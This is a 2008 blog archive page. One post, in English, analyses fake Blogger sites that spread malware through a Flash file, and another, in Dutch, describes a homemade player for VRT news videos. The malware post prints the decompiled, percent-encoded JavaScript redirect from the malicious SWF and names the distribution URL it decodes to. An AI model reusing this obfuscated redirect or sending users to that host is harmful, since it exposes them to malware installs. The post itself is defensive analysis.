Monthly Archives: October 2008

Nasty blog, scary flash, why are you attacking me?

Yesterday I noticed that all of a sudden no less then 6 new sites linked to this small-time blog. Great huh? Except when checking out those blogs (all on google’s blogger-platform by the way), I quickly saw they were fake, attempting to trick users into installing malware on their windows PC’s.

Being the curious would-be hacker I am, I took the plunge to see how these guys go about trying to infect careless users;

  1. the blogpost contains what seems to be a youtube movie, but which actually is just a animated gif with a link behind it
  2. when clicking “the movie” to play, a swf-file is downloaded (blog.swf)
  3. that blog.swf (which i downloaded on my linux-box and decompiled on the commandline using flare) contains this simple code:
    • this.getURL(‘javascript:eval(unescape(‘%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%20%3D%20%22%2F%2F%6D%30%38%62%2E%63%6F%6D%2F%69%6E%2E%63%67%69%3F%64%65%66%61%75%6C%74%22%3B’))’);
    • which translates roughtly into go to http://m08b.com/in.cgi?default
  4. and that URL then takes you for a rollercoaster ride, going through several redirector-sites before arriving on a dark corner of the web where you’re told to install an activeX-component to watch a movie or a codec or sometimes even be told (the irony) to install antivirus software from some unknown company.

Some lessons learned;

  • Flash is evil (or it can be) as it allows attackers to hide malicious code inside a nice looking (and binary) swf-file.
  • Don’t trust the incoming links functionality google’s blogsearch provides (i switched back to technorati for the ‘binnenkomers’-widget on my blog)
  • The ‘report web forgery‘ function in Firefox (under ‘help’) works great. Use it!

Eindelijk gevonden: het journaal op deredactie.be

Ik heb een alternatieve “journaal-player” voor de VRT bij elkaar gehackt, want op deredactie.be vind ik mijn gading niet. Pas op, ik ben een fan van de VRT nieuwsdienst. Echt! Maar op deredactie.be staat er echt te veel om mijn aandacht te schreeuwen. Te veel video, te veel nieuwsgeticker op elke pagina, op heel de site. Als ik een gewoon artikeltje zou zijn, ik zou me ook bedeesd in een hoekje van de pagina terugtrekken, stilletjes hopend dat iemand me toch zou opmerken.

En het Journaal, dat komt er vreemd genoeg dus ook amper aan bod. Het Journaal, ge weet wel, dat programma op televisie waarin ze al die clipjes uit die videoband aan elkaar plakken? Een zekere “Sponzen Ridder” wilde onlangs online naar het VRT nieuws kijken (iets over banken ofzo?) en dat ging als volgt;

Dus ging ik naar www.vrtnieuws.net. Daar vond ik een band met voorbijzwevende flash-filmpjes, echter geen journaal. Ik klikte helemaal bovenin de pagina op “nieuws”. Niets. Ik klikte vijf centimeter lager drie centimeter meer naar rechts op “journaal 7”. Clipjes. Geen overzicht, niks. Voorbijschuivende filmpjes, zonder inzicht in de structuur, of een soort inhoudstafel. Toen ging ik naar www.vtm.be, klikte op “nieuwsuitzendingen” en kon mooi en selectief de verschillende onderdelen bekijken van de afgelopen week vol nieuwsuitzendingen.

Volledig mee eens! Op deredactie.be hoort een grote knop “Bekijk Het Journaal” en als je daarop klikt, dan kom je op een pagina waar niets anders op moet staan dan zo een player en een inhoudtafel. Maar omdat dat er dus niet staat, ben ik zelf aan de slag gegaan.

Wat extra info voor de “technisch begiftigden”;

  • die verschrikkelijk opdringerige videoband bovenaan deredactie.be haalt een xml-bestand (atom) af om te weten wat er beschikbaar is voor publicatie (dank U firebug)
  • dat atom-bestand verwijst naar programma-specifieke atom-files met daarin titel, linken naar flv, mp4 en wmv-bestanden in lage en hoge kwaliteit en naar een thumbnail
  • met dat 2de atom-bestand maak ik een media-rss-bestand met per item de titel, link naar image en link naar één video-bestand (ik koos voor de mp4, standaard in lage kwaliteit)
  • dat media-rss bestand wordt dan zonder verpinken ingelezen als playlist door de magnifieke JW FLV-player, die op die manier volautomatisch de flash-interface inclusief de “inhoudstafel” opbouwt.